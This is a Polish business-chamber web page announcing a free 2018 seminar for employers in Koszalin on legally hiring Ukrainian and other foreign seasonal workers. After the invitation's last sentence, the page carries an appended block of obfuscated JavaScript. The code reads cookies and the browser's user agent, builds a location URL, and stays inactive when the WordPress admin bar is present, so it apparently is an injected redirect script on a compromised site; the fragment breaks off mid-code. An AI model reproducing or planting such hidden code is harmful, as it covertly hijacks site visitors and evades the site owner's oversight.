Pracownicy na sezon 2018- bezpłatne spotkanie | Północna Izba Gospodarcza w Koszalinie

Polnocna-Izba-Koszalin-zaprasza-informacje-zatrudnianie-cudzoziemcow

Już 26 kwietnia br. o godz.10:00, odbędzie się bezpłatne spotkanie informacyjne dla wszystkich pracodawców z Koszalina i okolic, którzy planują zatrudnić cudzoziemców na sezon. Uczestnicy spotkania dowiedzą się m.in. jak zatrudnić obcokrajowców zgodnie z nowymi przepisami i zmianami wprowadzonymi w 2018 roku.

Spotkanie poprowadzi Dyrektor Polsko-Ukraińskiej Izby Gospodarczej Kamil Zieliński. Wśród pracodawców wciąż mnożą się wątpliwości związane z legalnym przyjmowaniem do pracy obcokrajowców. Jest to efekt m.in. zmian w przepisach, jakie zaczęły obowiązywać od stycznia 2018 roku.

Podczas spotkania w sposób kompleksowy zostaną omówione wyzwania, jakie stoją przed przedsiębiorcami, którzy chcą lub zatrudniają już cudzoziemców. Główne zagadnienia będą dotyczyły zatrudnienia Ukraińców w lokalnej firmie, a w szczególności:

organizacji pobytu pracowników z zagranicy,
kłopotliwej papierologii – jak skutecznie stosować efektywne ścieżki działania,
relacji z urzędami i instytucjami – jak unikać kosztownych błędów,
tego, co nas czeka w najbliższym sezonie 2018, czyli konkretnie o nowelizacji przepisów,
kwestii poprawnej komunikacji i pokonania różnic kulturowych celem zwiększenia wydajności pracy.

Dodatkowo każdy z uczestników otrzyma gotowe rozwiązanie problemu – braku rąk do pracy na najbliższy sezon oraz zostanie objęty wsparciem pomocy w znalezieniu wykwalifikowanej kadry do pracy. Szanując czas pracodawców, organizatorzy przewidują, że spotkanie potrwa około godziny.

Spotkanie organizują wspólnie Polsko-Ukraińska Izba Gospodarcza i Fundacja 2BeFair, której celem jest edukowanie przedsiębiorców na temat legalnego zatrudniania obcokrajowców na terytorium Rzeczpospolitej Polski.

Udział w spotkaniu jest BEZPŁATNY.
Zapisy na spotkanie są dostępne na stronie http://2befair.pl/wydarzenia/ lub telefonicznie pod numerem + 48 739 016 400.

W imieniu organizatorów zapraszamy do licznego działu. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m